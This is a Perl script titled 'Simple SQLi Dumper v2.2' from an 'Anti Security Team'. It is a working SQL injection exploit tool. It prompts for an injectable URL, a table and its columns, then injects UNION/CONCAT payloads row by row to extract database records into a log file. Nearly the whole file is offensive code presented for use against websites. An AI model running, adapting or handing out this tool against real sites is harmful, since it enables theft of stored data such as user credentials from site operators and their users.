#!/usr/bin/perl

# Simple SQLi Dumper (SSDp) v2.2
# Coded by Vrs-hCk
# ander[at]antisecurity.org
# Anti Security Team

# Example: http://localhost/index.php?id=-1+union+select+1,2,3,c0li,5

use HTTP::Request;
use LWP::UserAgent;

my $c0de = "0x63306C69";
my $logo = "SSDp";

print "\n *************************************\n";
print " *       Simple SQLi Dumper 2.2      *\n";
print " *          Coded By Vrs-hCk         *\n";
print " *  MainHack.net - AntiSecurity.org  *\n";
print " *************************************\n\n";

print " [$logo] SQLi URL (c0li inside) : "; chomp ($sqli = <STDIN>);
print " [$logo] SQLi End Tag : "; chomp ($sql_end = <STDIN>);

print " [$logo] DB Name (leave blank for use current db) : "; chomp ($db_name = <STDIN>);
print " [$logo] Table Name : "; chomp ($table_name = <STDIN>);
print " [$logo] Columns Name (separate by comma char) : "; chomp ($columns = <STDIN>);

print " [$logo] Start Limit : "; chomp ($id_start = <STDIN>);
print " [$logo] Stop Limit : "; chomp ($id_end = <STDIN>);
print " [$logo] Log File : "; chomp ($sql_log = <STDIN>);

print "\n [$logo] DUMPING DATA ...\n\n";

my $concat = "CONCAT(".$c0de.",CONCAT_WS(0x3a,$columns),".$c0de.")";
my $query = str_replace($sqli,"c0li",$concat);
print " [$logo] [$table_name] $columns :\n\n";

for ($id=$id_start; $id<=$id_end; $id++) {
	my $exploit = $query."+FROM+".$db_name.".".$table_name."+LIMIT+".$id.",1".$sql_end;
	if ($db_name eq "") { $exploit = $query."+FROM+".$table_name."+LIMIT+".$id.",1".$sql_end; }
	my $res = get_content($exploit);
	if ($res =~ m/c0li(.+?)c0li/g) {
		my $data = $1;
		open(DAT,">>$sql_log") || die(" [$logo] Cannot Open File.\n");
		print DAT "$data\n";
		close(DAT);
		print " [$logo] ID ($id) $data\n";
	}
}

print "\n [$logo] Finish.\n\n";

sub str_replace {
	my $source  = shift;
	my $search  = shift;
	my $replace = shift;
	$source =~ s/$search/$replace/ge;
	return $source;
}

sub get_content() {
	my $url = $_[0];
	my $req = HTTP::Request->new(GET => $url);
	my $ua  = LWP::UserAgent->new();
	$ua->timeout(10);
	my $res = $ua->request($req);
	if ($res->is_error){
		print " [$logo] ID [timeout]\n";
	}
	return $res->content;
}

# AntiSecurity.org [10-09-2009]